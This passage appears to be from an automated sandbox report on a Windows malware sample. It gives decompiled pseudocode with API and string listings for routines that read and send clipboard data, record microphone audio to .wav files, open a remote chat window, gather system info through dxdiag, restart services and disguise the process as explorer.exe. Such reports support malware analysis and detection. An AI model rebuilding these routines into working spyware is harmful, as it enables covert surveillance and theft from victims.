                    				E004020F6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
                    				SetEvent( *(_t69 + 0x24));
                    				_t28 = E00401FAB( &_v108);
                    				E004041A2( &_v108,  &_v60, 4, 0xffffffff);
                    				_t121 = (_t118 & 0xfffffff8) - 0x5c;
                    				E004020F6(_t69, _t121, _t101, _t126, 0x473ec8);
                    				_t122 = _t121 - 0x18;
                    				E004020F6(_t69, _t122, _t101, _t126,  &_v76);
                    				E0041B8B0( &_v140, _t101);
                    				_t123 = _t122 + 0x30;
                    				_t111 =  *_t28 - 0x3a;
                    				if(_t111 == 0) {
                    					E00401E65( &_v116, _t101, _t117, __eflags, 0);
                    					_t36 = E0040247C();
                    					E00401FAB(E00401E65( &_v120, _t101, _t117, __eflags, 0));
                    					_t101 = _t36;
                    					_t113 = E00411AFB();
                    					__eflags = _t113;
                    					if(_t113 == 0) {
                    						L7:
                    						E00401E8D( &_v116, _t101);
                    						E00401FD8();
                    						E00401FD8();
                    						__eflags = 0;
                    						return 0;
                    					}
                    					 *0x471af0 = E00411D70(_t113, "DisplayMessage");
                    					_t45 = E00411D70(_t113, "GetMessage");
                    					_t104 = "CloseChat";
                    					 *0x471ae8 = _t45;
                    					_t46 = E00411D70(_t113, "CloseChat");
                    					_t124 = _t123 - 0x18;
                    					 *0x471aec = _t46;
                    					 *0x471ae5 = 1;
                    					E004020F6(_t69, _t124, "CloseChat", __eflags, 0x473f60);
                    					_push(0x74);
                    					E00404AA1(_t69, _t104, __eflags);
                    					L10:
                    					_t115 = HeapCreate(0, 0, 0);
                    					__eflags =  *0x471ae8(_t115,  &_v140);
                    					if(__eflags != 0) {
                    						_t124 = _t124 - 0x18;
                    						E004020B7(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
                    						_push(0x3b);
                    						E00404AA1(_t69, _t104, __eflags);
                    						HeapFree(_t115, 0, _v176);
                    					}
                    					goto L10;
                    				}
                    				_t128 = _t111 != 1;
                    				if(_t111 != 1) {
                    					goto L7;
                    				}
                    				_t57 =  *0x471af0(E00401FAB(E00401E65( &_v116, _t101, _t117, _t128, 0)));
                    				_t129 = _t57;
                    				if(_t57 == 0) {
                    					goto L7;
                    				}
                    				E0040417E(_t69,  &_v80, _t101, _t117, 0x465090);
                    				_t101 =  &_v84;
                    				E0041B7B3(_t69, _t123 - 0x18,  &_v84);
                    				_push(0x3b);
                    				E00404AA1(_t69,  &_v84, _t129);
                    				E00401F09();
                    				L4:
                    				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                    					TranslateMessage( &_v52);
                    					DispatchMessageA( &_v52);
                    				}
                    				if(__eflags < 0) {
                    					goto L4;
                    				}
                    				goto L7;
                    			}

































                    0x004054a0
                    0x004054a0
                    0x004054ae
                    0x004054b7
                    0x004054bf
                    0x004054c9
                    0x004054dd
                    0x004054e2
                    0x004054ec
                    0x004054f1
                    0x004054fb
                    0x00405504
                    0x00405509
                    0x0040550c
                    0x0040550f
                    0x004055be
                    0x004055c5
                    0x004055d8
                    0x004055dd
                    0x004055e6
                    0x004055e8
                    0x004055ea
                    0x00405593
                    0x00405597
                    0x004055a0
                    0x004055a9
                    0x004055b0
                    0x004055b6
                    0x004055b6
                    0x004055fd
                    0x00405604
                    0x00405609
                    0x0040560e
                    0x00405615
                    0x0040561a
                    0x0040561d
                    0x00405624
                    0x00405630
                    0x00405635
                    0x00405639
                    0x0040563e
                    0x00405647
                    0x00405657
                    0x00405659
                    0x0040565b
                    0x00405665
                    0x0040566a
                    0x0040566e
                    0x00405679
                    0x00405679
                    0x00000000
                    0x00405659
                    0x00405515
                    0x00405518
                    0x00000000
                    0x00000000
                    0x0040552e
                    0x00405535
                    0x00405537
                    0x00000000
                    0x00000000
                    0x00405542
                    0x0040554a
                    0x00405550
                    0x00405555
                    0x00405559
                    0x00405562
                    0x00000000
                    0x00405567
                    0x0040557e
                    0x00405589
                    0x00405589
                    0x00405591
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                    • GetMessageA.USER32 ref: 0040556F
                    • TranslateMessage.USER32(?), ref: 0040557E
                    • DispatchMessageA.USER32 ref: 00405589
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F60), ref: 00405641
                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: 072a9fc7f738e747ec2be198209fdf743ebc93dfa54697ec3254e605d2386afa
                    • Instruction ID: c7ad0bc2bba9eba515f20fdfb6f92c28ee374ec3078eb8f25256ba1cc8af618d
                    • Opcode Fuzzy Hash: 072a9fc7f738e747ec2be198209fdf743ebc93dfa54697ec3254e605d2386afa
                    • Instruction Fuzzy Hash: 7341BE716047016BCB00FB75DC5A86F36A9AB85744F40493EF906A32E1EF3D8905CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00416556(void* __ebp, void* _a8, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
                    				struct HWND__* __ebx;
                    				struct HWND__* _t13;
                    				void* _t19;
                    
                    				if(OpenClipboard(_t13) != 0) {
                    					__eax = EmptyClipboard();
                    					__eax = CloseClipboard();
                    					__eax = OpenClipboard(__ebx);
                    					__eflags = __eax;
                    					if(__eax != 0) {
                    						__esi = GetClipboardData(0xd);
                    						__edi = GlobalLock(__esi);
                    						GlobalUnlock(__esi) = CloseClipboard();
                    						__eflags = __edi;
                    						0x46b928 =  !=  ? __edi : 0x46b928;
                    						__ecx =  &_a28;
                    						__eax = E0040417E(__ebx,  &_a28, __edx, __ebp,  !=  ? __edi : 0x46b928);
                    						__esp = __esp - 0x18;
                    						__edx =  &_a24;
                    						__ecx = __esp;
                    						__eax = E0041B7B3(__ebx, __esp, __edx);
                    						_push(0x6b);
                    						__ecx = 0x474580;
                    						__eax = E00404AA1(0x474580, __edx, __eflags);
                    						E00401F09();
                    					}
                    				}
                    				_t4 =  &_a16; // 0x404421
                    				E00401E8D(_t4, _t19);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}






                    0x0041655f
                    0x00416565
                    0x0041656b
                    0x00416572
                    0x00416578
                    0x0041657a
                    0x00416588
                    0x00416592
                    0x0041659a
                    0x004165a0
                    0x004165a7
                    0x004165ab
                    0x004165af
                    0x004165b4
                    0x004165b7
                    0x004165bb
                    0x004165bd
                    0x004165c2
                    0x004165c4
                    0x004165c9
                    0x00415b00
                    0x00415b00
                    0x0041657a
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                    • OpenClipboard.USER32 ref: 00416557
                    • EmptyClipboard.USER32 ref: 00416565
                    • CloseClipboard.USER32 ref: 0041656B
                    • OpenClipboard.USER32 ref: 00416572
                    • GetClipboardData.USER32 ref: 00416582
                    • GlobalLock.KERNEL32 ref: 0041658B
                    • GlobalUnlock.KERNEL32(00000000), ref: 00416594
                    • CloseClipboard.USER32 ref: 0041659A
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: !D@
                    • API String ID: 2172192267-604454484
                    • Opcode ID: 6a7433df843c8959fe7361fc20f616ee5853ffd3ec3edd77439c3f00ad2bf3c6
                    • Instruction ID: 2feb1577463e6429aa8f56d0ceab3d83249e57da554749986060925d63ad37f0
                    • Opcode Fuzzy Hash: 6a7433df843c8959fe7361fc20f616ee5853ffd3ec3edd77439c3f00ad2bf3c6
                    • Instruction Fuzzy Hash: 7A01523120430097C314AF72DC59AAE77A9AF80702F00053EF90AE15A2DF39D955CB9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0041A5A2(char _a4) {
                    				intOrPtr _v28;
                    				struct _SERVICE_STATUS _v32;
                    				int _t22;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t22 = 0;
                    				_t27 = OpenSCManagerW(0, 0, 0x11);
                    				_t26 = OpenServiceW(_t27, E00401F04( &_a4), 0xf003f);
                    				if(_t26 != 0) {
                    					if(ControlService(_t26, 1,  &_v32) != 0) {
                    						do {
                    							QueryServiceStatus(_t26,  &_v32);
                    						} while (_v28 != 1);
                    						StartServiceW(_t26, 0, 0);
                    						asm("sbb ebx, ebx");
                    						_t22 = 3;
                    						CloseServiceHandle(_t27);
                    						CloseServiceHandle(_t26);
                    					} else {
                    						CloseServiceHandle(_t27);
                    						CloseServiceHandle(_t26);
                    						_t22 = 2;
                    					}
                    				} else {
                    					CloseServiceHandle(_t27);
                    				}
                    				E00401F09();
                    				return _t22;
                    			}








                    0x0041a5ad
                    0x0041a5bf
                    0x0041a5ce
                    0x0041a5d2
                    0x0041a5ec
                    0x0041a5fe
                    0x0041a603
                    0x0041a609
                    0x0041a612
                    0x0041a621
                    0x0041a626
                    0x0041a629
                    0x0041a62c
                    0x0041a5ee
                    0x0041a5f5
                    0x0041a5f8
                    0x0041a5fa
                    0x0041a5fa
                    0x0041a5d4
                    0x0041a5d5
                    0x0041a5d5
                    0x0041a631
                    0x0041a63e

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00419F1B,00000000), ref: 0041A5B1
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419F1B,00000000), ref: 0041A5C8
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419F1B,00000000), ref: 0041A5D5
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419F1B,00000000), ref: 0041A5E4
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419F1B,00000000), ref: 0041A5F5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419F1B,00000000), ref: 0041A5F8
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 97794fd06f3f4d056e92a45b345f3586d283e83e9eeac7d9e9978df6c721a779
                    • Instruction ID: a1cf919fe3dff3b7a8d5cb7feb7fb32e2e8ed7f496af81daa4d3652d110830a3
                    • Opcode Fuzzy Hash: 97794fd06f3f4d056e92a45b345f3586d283e83e9eeac7d9e9978df6c721a779
                    • Instruction Fuzzy Hash: 4D11E97154121C7FD6116F64DC85CFF3B6CDB41B66B01003AF905A2191DF788D8AAABA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00447B11(char _a4) {
                    				char _v8;
                    
                    				_t26 = _a4;
                    				_t52 =  *_a4;
                    				if( *_a4 != 0x45c300) {
                    					E00446172(_t52);
                    					_t26 = _a4;
                    				}
                    				E00446172( *((intOrPtr*)(_t26 + 0x3c)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x30)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x34)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x38)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x28)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x2c)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x40)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x44)));
                    				E00446172( *((intOrPtr*)(_a4 + 0x360)));
                    				_v8 =  &_a4;
                    				E004479D7(5,  &_v8);
                    				_v8 =  &_a4;
                    				return E00447A27(4,  &_v8);
                    			}




                    0x00447b17
                    0x00447b1a
                    0x00447b22
                    0x00447b25
                    0x00447b2a
                    0x00447b2d
                    0x00447b31
                    0x00447b3c
                    0x00447b47
                    0x00447b52
                    0x00447b5d
                    0x00447b68
                    0x00447b73
                    0x00447b7e
                    0x00447b8c
                    0x00447b94
                    0x00447b9d
                    0x00447ba5
                    0x00447bb9

                    APIs
                    • _free.LIBCMT ref: 00447B25
                      • Part of subcall function 00446172: RtlFreeHeap.NTDLL(00000000,00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000), ref: 00446188
                      • Part of subcall function 00446172: GetLastError.KERNEL32(00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000,00000000), ref: 0044619A
                    • _free.LIBCMT ref: 00447B31
                    • _free.LIBCMT ref: 00447B3C
                    • _free.LIBCMT ref: 00447B47
                    • _free.LIBCMT ref: 00447B52
                    • _free.LIBCMT ref: 00447B5D
                    • _free.LIBCMT ref: 00447B68
                    • _free.LIBCMT ref: 00447B73
                    • _free.LIBCMT ref: 00447B7E
                    • _free.LIBCMT ref: 00447B8C
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: fed49b100aa20ea3fafccd6334e92db51d9fdba12f4c1d97bb0af1096d7f9e66
                    • Instruction ID: a49214a411c6f3485cca155a2ef5d31fe82cde86ce56a3bb6d4c3a44bf137ae0
                    • Opcode Fuzzy Hash: fed49b100aa20ea3fafccd6334e92db51d9fdba12f4c1d97bb0af1096d7f9e66
                    • Instruction Fuzzy Hash: E111A776100108BFDB01EF56CC42CD93B76FF06395B1280AABA484B232D635DB51DB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456A0F), ref: 00455937
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 549ac8c6ffbbbca03196c46c4a4af830d735e262cd2c25e58c17044eb1be0d64
                    • Instruction ID: 88397f005034e607bc9cd2dc55b28184569b41b4c6f828da8fcbfb131d4c91b7
                    • Opcode Fuzzy Hash: 549ac8c6ffbbbca03196c46c4a4af830d735e262cd2c25e58c17044eb1be0d64
                    • Instruction Fuzzy Hash: 9A514A70900A09CBCF109F58E5985BEBBB4FB09316F244297DC81A7256CB799D1DCB1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00416F2A(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v204;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t46;
                    				void* _t54;
                    				void* _t55;
                    				void* _t90;
                    				void* _t92;
                    				void* _t93;
                    
                    				_t95 = __eflags;
                    				_t90 = __edi;
                    				E00403014(_t54,  &_v76, E0040417E(_t54,  &_v52, __edx, _t92, E0043BA8F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
                    				E00401F09();
                    				_t55 = 0;
                    				ShellExecuteW(0, L"open", L"dxdiag", E00401F04(E0040B7F1( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
                    				E00401F09();
                    				E004020DF(0,  &_v28);
                    				_t91 = 0;
                    				do {
                    					E00401F04( &_v76);
                    					_t88 =  &_v28;
                    					E0041BF1A( &_v28);
                    					Sleep(0x64);
                    					_t91 = _t91 + 1;
                    				} while (E00406A4F() != 0 && _t91 < 0x4b0);
                    				if(E00406A4F() == 0) {
                    					DeleteFileW(E00401F04( &_v76));
                    					_t75 =  &_v204;
                    					E004046F7( &_v204, _t92, 1);
                    					_t46 = E004048C8( &_v204, _t91, _t75);
                    					_t100 = _t46;
                    					if(_t46 != 0) {
                    						_t91 = _t93 - 0x18;
                    						_t88 = E00402F31( &_v52,  &_a4, _t92, 0x473ec8);
                    						E00402F10(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
                    						_push(0x97);
                    						E00404AA1( &_v204, _t49, _t100);
                    						E00401FD8();
                    						E00404E26(_t88);
                    						_t55 = 1;
                    					}
                    					E00404EE2(_t55,  &_v204, _t88, _t91);
                    				}
                    				E00401FD8();
                    				E00401F09();
                    				E00401FD8();
                    				return _t55;
                    			}
















                    0x00416f2a
                    0x00416f2a
                    0x00416f53
                    0x00416f5c
                    0x00416f61
                    0x00416f8a
                    0x00416f93
                    0x00416f9b
                    0x00416fa0
                    0x00416fa2
                    0x00416fa5
                    0x00416faa
                    0x00416faf
                    0x00416fb6
                    0x00416fbf
                    0x00416fc5
                    0x00416fdb
                    0x00416fea
                    0x00416ff2
                    0x00416ff8
                    0x00417004
                    0x00417009
                    0x0041700b
                    0x00417013
                    0x00417027
                    0x0041702b
                    0x00417031
                    0x0041703c
                    0x00417044
                    0x0041704f
                    0x00417054
                    0x00417054
                    0x0041705c
                    0x0041705c
                    0x00417064
                    0x0041706c
                    0x00417074
                    0x00417080

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00416F8A
                      • Part of subcall function 0041BF1A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A6B8), ref: 0041BF33
                    • Sleep.KERNEL32(00000064), ref: 00416FB6
                    • DeleteFileW.KERNEL32(00000000), ref: 00416FEA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleep
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    • API String ID: 1462127192-2001430897
                    • Opcode ID: f87479b8fe898d4e5ce0cbe5e4af97e9bc4d8a94f0227c97466ede0fbdb6e567
                    • Instruction ID: 408950cf0da047113fcb4f58cd945219e34246eb5b31643196ea0b8ef7e9dce4
                    • Opcode Fuzzy Hash: f87479b8fe898d4e5ce0cbe5e4af97e9bc4d8a94f0227c97466ede0fbdb6e567
                    • Instruction Fuzzy Hash: 0D313E319402195ACB04FB62DC96DED7738AF50309F00417EF606B31E2EF785A8ACA9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 15%
                    			E004072D3(void* __edx, void* __esi, void* __ebp) {
                    				char _v4;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __ecx;
                    				signed int _t19;
                    				void* _t40;
                    				void* _t48;
                    				intOrPtr _t49;
                    				void* _t52;
                    				void* _t53;
                    				void* _t54;
                    				void* _t56;
                    				char* _t57;
                    				void* _t59;
                    				signed int _t65;
                    
                    				_t56 = __ebp;
                    				_t53 = __esi;
                    				_t52 = _t48;
                    				if(_t52 != 0) {
                    					L3:
                    					 *0x471b04(_t53, _t56);
                    					_t54 = E0040717E();
                    					if(_t52 == 0) {
                    						_t49 =  *((intOrPtr*)(_t54 + 0x10));
                    						_t57 = L"explorer.exe";
                    						 *0x474a00 =  *(_t49 + 0x3c);
                    						 *0x474a04 =  *(_t49 + 0x44);
                    						_t19 =  *0x471b14; // 0x0
                    					} else {
                    						_t57 =  *0x474a04; // 0x0
                    						_t19 =  *0x474a00; // 0x0
                    					}
                    					 *0x471afc( *((intOrPtr*)(_t54 + 0x10)) + 0x38, _t19);
                    					 *0x471afc( *((intOrPtr*)(_t54 + 0x10)) + 0x40, _t57);
                    					if(_t52 != 0) {
                    						_v20 = _v20 & 0x00000000;
                    						 *0x471b0c(GetCurrentProcess(), 0x471b14,  &_v20, 0x8000);
                    						 *0x471b14 =  *0x471b14 & 0x00000000;
                    						_t65 =  *0x471b14;
                    					}
                    					E00407127(_t65, "PEB: %x\n", _t54);
                    					E004070F2(_t65);
                    					E00407127(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x3c)));
                    					E004070F2(_t65);
                    					E00407127(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x44)));
                    					 *0x471b10();
                    					return  *0x471af8(0, E00407230, _t52);
                    				}
                    				 *0x471b14 =  *0x471b14 & 0x00000000;
                    				_v4 = 0x1000;
                    				_t40 =  *0x471b00(GetCurrentProcess(), 0x471b14, 0,  &_v4, 0x3000, 4);
                    				_t62 = _t40;
                    				if(_t40 < 0) {
                    					_push("[-] NtAllocateVirtualMemory Error\n");
                    					return E00407127(__eflags);
                    				}
                    				E0043F1E4( *0x471b14, E0043BA8F(GetCurrentProcess, _t48, _t62, L"windir"));
                    				E0043F206( *0x471b14, L"\\explorer.exe");
                    				_push("[+] NtAllocateVirtualMemory Success\n");
                    				E00407127(_t62);
                    				_t59 = _t59 + 0x18;
                    				goto L3;
                    			}


















                    0x004072d3
                    0x004072d3
                    0x004072dc
                    0x004072e0
                    0x00407344
                    0x00407346
                    0x00407351
                    0x00407355
                    0x00407374
                    0x00407377
                    0x0040737f
                    0x00407387
                    0x0040738c
                    0x00407357
                    0x00407357
                    0x0040735d
                    0x0040735d
                    0x00407399
                    0x004073a7
                    0x004073af
                    0x004073b1
                    0x004073c8
                    0x004073ce
                    0x004073ce
                    0x004073ce
                    0x004073db
                    0x004073e6
                    0x004073f1
                    0x004073fc
                    0x00407402
                    0x0040740a
                    0x00000000
                    0x0040741f
                    0x004072e2
                    0x004072fc
                    0x00407307
                    0x0040730d
                    0x0040730f
                    0x00407364
                    0x00000000
                    0x0040736e
                    0x00407322
                    0x00407332
                    0x00407337
                    0x0040733c
                    0x00407341
                    0x00000000

                    APIs
                    • GetCurrentProcess.KERNEL32(00471B14,00000000,004742C0,00003000,00000004,00000000,00000001), ref: 00407304
                    • GetCurrentProcess.KERNEL32(00471B14,00000000,00008000,?,00000000,00000001,00000000,0040757D,C:\Users\user\Desktop\BiU282bjyR.exe), ref: 004073C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess
                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                    • API String ID: 2050909247-4242073005
                    • Opcode ID: be889c116013b1fa4747afde616fba92b97a2ca90696d7d342040b6e3f1c92ac
                    • Instruction ID: 6900781939b22ce224e3a37e1fcc46b1c6df2e8cf649a8179cf3b89f0a8dbd06
                    • Opcode Fuzzy Hash: be889c116013b1fa4747afde616fba92b97a2ca90696d7d342040b6e3f1c92ac
                    • Instruction Fuzzy Hash: 2031C375644300AFD310EB69EC46F5637A8BB44705F10087AFA09A66F1EB78F840DB2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00401D0B(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
                    				char _v84;
                    				char _v112;
                    				void* _v116;
                    				char _v136;
                    				void* _v140;
                    				char _v160;
                    				void* _v164;
                    				char _v184;
                    				void* _v188;
                    				char _v204;
                    				char _v208;
                    				void* _v212;
                    				char _v228;
                    				char _v232;
                    				char _v236;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t29;
                    				intOrPtr _t43;
                    				void* _t76;
                    				void* _t79;
                    
                    				_t47 = __ebx;
                    				_push(_t76);
                    				E00401F86(__ebx,  &_v228);
                    				_t84 = _a8 - 0x3c0;
                    				if(_a8 == 0x3c0) {
                    					E00401707();
                    					E0043A379( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016FF());
                    					E00402093(__ebx,  &_v204, __edx, _t79,  &_v84);
                    					_push(L".wav");
                    					_t29 = E0041B6F3( &_v112,  &_v208);
                    					E00401F13( &_v232, _t31, _t76, E00403014(_t47,  &_v184, E00402FA5( &_v160, E00402F72(__ebx,  &_v136, 0x473d4c, _t79), 0x5c), __edi, _t79, _t84, _t29));
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    					E00401FD8();
                    					E00401A6D(E00401F04( &_v236), 0x471a88);
                    					waveInUnprepareHeader( *0x471ac0, 0x471a88, 0x20);
                    					0x471a88->lpData = E00401FAB(0x473d64);
                    					_t43 =  *0x471ac4; // 0x0
                    					 *0x471a8c = _t43;
                    					 *0x471a90 = 0;
                    					 *0x471a94 = 0;
                    					 *0x471a98 = 0;
                    					 *0x471a9c = 0;
                    					waveInPrepareHeader( *0x471ac0, 0x471a88, 0x20);
                    					waveInAddBuffer( *0x471ac0, 0x471a88, 0x20);
                    				}
                    				return E00401F09();
                    			}
























                    0x00401d0b
                    0x00401d1b
                    0x00401d1c
                    0x00401d21
                    0x00401d28
                    0x00401d32
                    0x00401d50
                    0x00401d64
                    0x00401d69
                    0x00401d79
                    0x00401dad
                    0x00401db6
                    0x00401dbf
                    0x00401dc8
                    0x00401dd4
                    0x00401ddd
                    0x00401df4
                    0x00401e02
                    0x00401e14
                    0x00401e19
                    0x00401e25
                    0x00401e2c
                    0x00401e31
                    0x00401e36
                    0x00401e3b
                    0x00401e40
                    0x00401e4f
                    0x00401e4f
                    0x00401e62

                    APIs
                    • _strftime.LIBCMT ref: 00401D50
                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • waveInUnprepareHeader.WINMM(00471A88,00000020,00000000,?), ref: 00401E02
                    • waveInPrepareHeader.WINMM(00471A88,00000020), ref: 00401E40
                    • waveInAddBuffer.WINMM(00471A88,00000020), ref: 00401E4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav$L=G$d=G
                    • API String ID: 3809562944-3288643125
                    • Opcode ID: c7e4db9caf34e50b22892be820232dcdac848c72547c8b19697c22d06ce1dc6f
                    • Instruction ID: 79c345cad973a5d9016c9832f03e3a96b018df0d2da3309026ec5cf95bb41c9f
                    • Opcode Fuzzy Hash: c7e4db9caf34e50b22892be820232dcdac848c72547c8b19697c22d06ce1dc6f
                    • Instruction Fuzzy Hash: A3317E315053019BC314EF25EC56AAE77E8BB94319F00443EF149A21F2EF789A48CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00401BE9(void* __eflags) {
